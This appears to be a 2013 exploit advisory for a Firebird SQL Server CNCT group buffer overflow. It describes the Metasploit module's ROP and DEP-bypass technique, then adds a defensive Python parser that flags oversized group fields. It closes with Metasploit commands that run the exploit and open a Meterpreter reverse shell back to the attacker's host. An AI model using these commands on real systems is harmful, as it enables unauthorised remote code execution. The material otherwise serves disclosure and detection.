Timeline :
Vulnerability discovered by Spencer McIntyre on 2013-01-31
Vulnerability reported to the vendor on 2013-03-05
Coordinated public release of the vulnerability on 2013-03-08
Metasploit PoC provided on 2013-03-08
PoC provided by :
Spencer McIntyre
Reference(s) :
Affected version(s) :
Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2
Tested on Windows XP Pro SP3 with :
FireBird 2.5.2.26539
Description :
This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which overwrites a pointer, allowing the attacker to control where data is read from. Shortly after the controlled read, the pointer is called, resulting in code execution. The vulnerability lies in the handling of the group number extracted from the CNCT information sent by the client, whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot is then used to execute the ROP chain, which ultimately calls VirtualAlloc to bypass DEP.
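As an added defender-side example (not part of this page or of the Metasploit module): a minimal parser for the user-identification block of a Firebird op_connect packet that flags CNCT_group values far longer than the short decimal gid a normal client sends. The tag numbers, the one-byte tag / one-byte length / value layout, and the length threshold are assumptions taken from Firebird's wire protocol; both packets are constructed here.

```python
# Constructed example: inspect the CNCT (user-id) clumplets of a Firebird
# op_connect packet and report group entries that are suspiciously long.
# Tag values are assumed from Firebird's protocol header (not taken from the page).
CNCT_USER = 1
CNCT_PASSWD = 2
CNCT_HOST = 4
CNCT_GROUP = 5

# A decimal gid fits in a handful of bytes; anything much longer is anomalous.
MAX_GROUP_LEN = 10


def parse_cnct_user_id(block: bytes):
    """Return a list of (tag, value) pairs from a tag/len/value clumplet block."""
    items, pos = [], 0
    while pos < len(block):
        if pos + 2 > len(block):
            raise ValueError("truncated clumplet header at offset %d" % pos)
        tag, length = block[pos], block[pos + 1]
        value = block[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated clumplet body at offset %d" % pos)
        items.append((tag, value))
        pos += 2 + length
    return items


def is_well_formed(block: bytes) -> bool:
    """True when every clumplet's declared length fits inside the block."""
    try:
        parse_cnct_user_id(block)
        return True
    except ValueError:
        return False


def oversized_groups(block: bytes, limit: int = MAX_GROUP_LEN):
    """Return the CNCT_group values whose length exceeds `limit`."""
    return [v for t, v in parse_cnct_user_id(block) if t == CNCT_GROUP and len(v) > limit]


def build_clumplet(tag: int, value: bytes) -> bytes:
    """Encode one clumplet; the length field is a single byte."""
    if len(value) > 255:
        raise ValueError("clumplet value too long")
    return bytes([tag, len(value)]) + value


# Constructed samples: a normal login and one carrying a 200-byte group field.
BENIGN = (build_clumplet(CNCT_USER, b"sysdba") + build_clumplet(CNCT_GROUP, b"1000")
          + build_clumplet(CNCT_HOST, b"client-host"))
SUSPECT = build_clumplet(CNCT_USER, b"sysdba") + build_clumplet(CNCT_GROUP, b"A" * 200)
```

The same check can be dropped into a packet-capture script keyed on the Firebird listener port to log connection attempts that carry an oversized group field.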
Commands :
use exploit/windows/misc/fb_cnct_group
set RHOST 192.168.178.22
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo